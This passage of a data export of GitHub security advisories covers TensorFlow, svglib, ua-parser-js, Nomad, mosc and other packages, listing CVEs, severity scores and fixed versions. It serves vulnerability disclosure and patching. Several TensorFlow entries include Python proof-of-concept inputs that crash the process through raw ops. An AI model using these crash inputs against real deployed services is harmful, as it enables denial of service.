cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-qw5h-7f53-xrp6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29615'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e07e1c3d26492c06f078c7e5bf2d138043e199c1'}]","{'cwe_ids': ['CWE-674'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:22:43Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-xqfj-cr6q-pc8w,2021-05-17T21:12:35Z,2021-05-21T14:28:58Z,,['CVE-2021-29618'],Crash in `tf.transpose` with complex inputs,"### Impact +Passing a complex argument to `tf.transpose` at the same time as passing `conjugate=True` argument results in a crash: + +```python +import tensorflow as tf +tf.transpose(conjugate=True, a=complex(1)) +``` + +### Patches +We have received a patch for the issue in GitHub commit [1dc6a7ce6e0b3e27a7ae650bfc05b195ca793f88](https://github.com/tensorflow/tensorflow/commit/1dc6a7ce6e0b3e27a7ae650bfc05b195ca793f88). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported in [#42105](https://github.com/tensorflow/issues/42105) and fixed in [#46973](https://github.com/tensorflow/issues/46973).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xqfj-cr6q-pc8w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29618'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1dc6a7ce6e0b3e27a7ae650bfc05b195ca793f88'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/issues/42105'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/issues/46973'}]","{'cwe_ids': ['CWE-755'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:12:35Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-3vcg-8p79-jpcv,2023-08-30T22:56:50Z,2021-05-06T18:52:01Z,,['CVE-2020-10799'],SVGlib Vulnerable to XXE Attacks,The svglib package through 0.9.3 for Python allows XXE attacks via an `svg2rlg` call.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'svglib'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.9.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10799'}, {'type': 'WEB', 'url': 'https://github.com/deeplook/svglib/issues/229'}, {'type': 'WEB', 'url': 'https://github.com/deeplook/svglib/commit/35686a130ed260c71a382a8f83d41fd31a46704d'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T22:26:32Z', 'nvd_published_at': '2020-03-20T23:15:00Z'}" +1.4.0,GHSA-662x-fhqg-9p8v,2021-05-03T19:19:25Z,2021-05-07T16:18:19Z,,['CVE-2020-7733'],Regular Expression Denial of Service in ua-parser-js,The package ua-parser-js before 0.7.22 are vulnerable to Regular Expression Denial of Service (ReDoS) via the regex for Redmi Phones and Mi Pad Tablets UA.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ua-parser-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7733'}, {'type': 'WEB', 'url': 'https://github.com/faisalman/ua-parser-js/commit/233d3bae22a795153a7e6638887ce159c63e557d'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBFAISALMAN-674666'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-674665'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-UAPARSERJS-610226'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T19:19:25Z', 'nvd_published_at': '2020-09-16T14:15:00Z'}" +1.4.0,GHSA-8v9x-9xqg-r8mr,2021-04-19T22:31:31Z,2021-05-10T19:17:15Z,,['CVE-2020-8268'],Prototype pollution in json8-merge-patch,Prototype pollution vulnerability in json8-merge-patch npm package < 1.0.3 may allow attackers to inject or modify methods and properties of the global object constructor.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'json8-merge-patch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8268'}, {'type': 'WEB', 'url': 'https://github.com/sonnyp/JSON8/issues/113'}, {'type': 'WEB', 'url': 'https://github.com/sonnyp/JSON8/commit/2e890261b66cbc54ae01d0c79c71b0fd18379e7e#diff-faa7bef039022bc7ca1c613331b2373950ddd3d65ebf25d1699fbdf89773a387'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/980649'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/json8-merge-patch'}]","{'cwe_ids': ['CWE-1321', 'CWE-20', 'CWE-471'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T22:31:31Z', 'nvd_published_at': '2020-11-09T15:15:00Z'}" +1.4.0,GHSA-c94v-8fff-73ph,2021-05-07T17:57:37Z,2021-05-10T15:36:55Z,,['CVE-2021-28162'],Command Injection in @theia/messages,"In Eclipse Theia versions up to and including 0.16.0, in the notification messages there is no HTML escaping, so Javascript code can run.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@theia/messages'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28162'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/issues/7283'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/pull/7289'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/blob/master/CHANGELOG.md#v100---26032020'}]","{'cwe_ids': ['CWE-829'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T17:57:37Z', 'nvd_published_at': '2021-03-12T22:15:00Z'}" +1.4.0,GHSA-h3rx-g5c9-8q4x,2022-12-03T03:40:15Z,2021-05-10T18:37:26Z,,['CVE-2020-7736'],Prototype Pollution in bmoor,The package bmoor before 0.8.12 are vulnerable to Prototype Pollution via the set function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'bmoor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7736'}, {'type': 'WEB', 'url': 'https://github.com/b-heilman/bmoor/commit/7d4a086a1dc3ef11ed0b323824d02348734b7da5'}, {'type': 'PACKAGE', 'url': 'https://github.com/b-heilman/bmoor'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-BMOOR-598664'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/bmoor'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-22T22:35:49Z', 'nvd_published_at': '2020-10-02T10:15:00Z'}" +1.4.0,GHSA-hr84-fqvp-48mm,2021-05-18T23:23:47Z,2021-05-21T14:21:16Z,,['CVE-2021-29521'],Segfault in SparseCountSparseOutput,"### Impact +Specifying a negative dense shape in `tf.raw_ops.SparseCountSparseOutput` results in a segmentation fault being thrown out from the standard library as `std::vector` invariants are broken. + +```python +import tensorflow as tf + +indices = tf.constant([], shape=[0, 0], dtype=tf.int64) +values = tf.constant([], shape=[0, 0], dtype=tf.int64) +dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) +weights = tf.constant([], shape=[0, 0], dtype=tf.int64) + +tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/8f7b60ee8c0206a2c99802e3a4d1bb55d2bc0624/tensorflow/core/kernels/count_ops.cc#L199-L213) assumes the first element of the dense shape is always positive and uses it to initialize a `BatchedMap` (i.e., [`std::vector>`](https://github.com/tensorflow/tensorflow/blob/8f7b60ee8c0206a2c99802e3a4d1bb55d2bc0624/tensorflow/core/kernels/count_ops.cc#L27)) data structure. + +```cc + bool is_1d = shape.NumElements() == 1; + int num_batches = is_1d ? 1 : shape.flat()(0); + ... + auto per_batch_counts = BatchedMap(num_batches); +``` + +If the `shape` tensor has more than one element, `num_batches` is the first value in `shape`. + +Ensuring that the `dense_shape` argument is a valid tensor shape (that is, all elements are non-negative) solves this issue. + +### Patches +We have patched the issue in GitHub commit [c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5](https://github.com/tensorflow/tensorflow/commit/c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-hr84-fqvp-48mm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29521'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5'}]","{'cwe_ids': ['CWE-131'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:23:47Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-cj2h-ww36-v932,2021-05-13T14:53:36Z,2021-05-18T18:20:26Z,,['CVE-2020-7956'],Improper Certificate Validation in HashiCorp Nomad,"HashiCorp Nomad and Nomad Enterprise up to 0.10.2 incorrectly validated role/region associated with TLS certificates used for mTLS RPC, and were susceptible to privilege escalation. Fixed in 0.10.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7956'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/nomad/issues/7003'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/nomad/pull/7023'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/nomad/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-13T14:53:36Z', 'nvd_published_at': None}" +1.4.0,GHSA-j665-rvj7-2jv9,2021-07-29T18:11:51Z,2021-05-17T21:00:17Z,,['CVE-2020-7672'],Code Injection in mosc,"mosc through 1.0.0 is vulnerable to Arbitrary Code Execution. User input provided to `properties` argument is executed by the `eval` function, resulting in code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'mosc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7672'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MOSC-571492'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-13T19:19:45Z', 'nvd_published_at': '2020-06-10T16:15:00Z'}" +1.4.0,GHSA-x8h6-xgqx-jqgp,2021-05-18T17:53:08Z,2021-05-21T14:26:26Z,,['CVE-2021-29580'],Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad`,"### Impact +The implementation of `tf.raw_ops.FractionalMaxPoolGrad` triggers an undefined behavior if one of the input tensors is empty: + +```python +import tensorflow as tf + +orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) +orig_output = tf.constant([], dtype=tf.int64) +out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) +row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) +col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) + +tf.raw_ops.FractionalMaxPoolGrad( + orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, + row_pooling_sequence=row_pooling_sequence, + col_pooling_sequence=col_pooling_sequence, overlapping=False) +``` + +The code is also vulnerable to a denial of service attack as a `CHECK` condition becomes false and aborts the process + +```python +import tensorflow as tf + +orig_input = tf.constant([1], shape=[1], dtype=tf.int64) +orig_output = tf.constant([1], shape=[1], dtype=tf.int64) +out_backprop = tf.constant([1, 1], shape=[2, 1, 1, 1], dtype=tf.int64) +row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) +col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) + +tf.raw_ops.FractionalMaxPoolGrad( + orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, + row_pooling_sequence=row_pooling_sequence, + col_pooling_sequence=col_pooling_sequence, overlapping=False) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/169054888d50ce488dfde9ca55d91d6325efbd5b/tensorflow/core/kernels/fractional_max_pool_op.cc#L215) fails to validate that input and output tensors are not empty and are of the same rank. Each of these unchecked assumptions is responsible for the above issues. + +### Patches +We have patched the issue in GitHub commit [32fdcbff9d06d010d908fcc4bd4b36eb3ce15925](https://github.com/tensorflow/tensorflow/commit/32fdcbff9d06d010d908fcc4bd4b36eb3ce15925). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-x8h6-xgqx-jqgp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29580'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/32fdcbff9d06d010d908fcc4bd4b36eb3ce15925'}]","{'cwe_ids': ['CWE-908'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T17:53:08Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-cg42-4wrc-gp47,2021-07-29T18:12:49Z,2021-05-17T21:00:37Z,,['CVE-2020-7673'],Code Injection in node-extend,"node-extend through 0.2.0 is vulnerable to Arbitrary Code Execution. User input provided to the argument `A` of `extend` function`(A,B,as,isAargs)` located within `lib/extend.js` is executed by the `eval` function, resulting in code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-extend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7673'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODEEXTEND-571491'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-13T17:00:57Z', 'nvd_published_at': '2020-06-10T16:15:00Z'}" +1.4.0,GHSA-r4pj-74mg-8868,2021-05-18T23:19:06Z,2021-05-21T14:21:47Z,,['CVE-2021-29524'],Division by 0 in `Conv2DBackpropFilter`,"### Impact +An attacker can trigger a division by 0 in `tf.raw_ops.Conv2DBackpropFilter`: + +```python +import tensorflow as tf + +input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) +filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) +out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) + +tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, + out_backprop=out_backprop, + strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, + padding='SAME', explicit_paddings=[], + data_format='NHWC', dilations=[1, 1, 1, 1]) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/496c2630e51c1a478f095b084329acedb253db6b/tensorflow/core/kernels/conv_grad_shape_utils.cc#L130) does a modulus operation where the divisor is controlled by the caller: + +```cc + if (dims->in_depth % filter_shape.dim_size(num_dims - 2)) { ... } +``` + +### Patches +We have patched the issue in GitHub commit [fca9874a9b42a2134f907d2fb46ab774a831404a](https://github.com/tensorflow/tensorflow/commit/fca9874a9b42a2134f907d2fb46ab774a831404a). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 